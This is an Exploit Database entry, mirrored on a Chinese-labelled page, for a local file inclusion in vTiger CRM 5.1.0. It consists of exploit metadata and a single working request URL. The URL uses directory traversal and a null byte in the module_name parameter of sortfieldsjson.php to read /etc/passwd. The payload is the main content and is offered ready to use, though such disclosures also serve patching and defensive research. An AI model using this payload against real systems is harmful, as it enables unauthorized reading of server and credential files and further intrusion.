vTiger CRM 5.1.0 – Local File Inclusion

• Exploit Database
• 16 阅读

• 作者： Pi3rrot
  日期： 2012-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18770/

• # Exploit Title: VTiger CRM
  # Google Dork: None
  # Date: 20/03/2012
  # Author: Pi3rrot
  # Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
  # Version: 5.1.0
  # Tested on: CentOS 6
  # CVE : none
  
  We have find this vulnerabilitie in VTiger 5.1.0
  In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
  
  Try this :
  https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00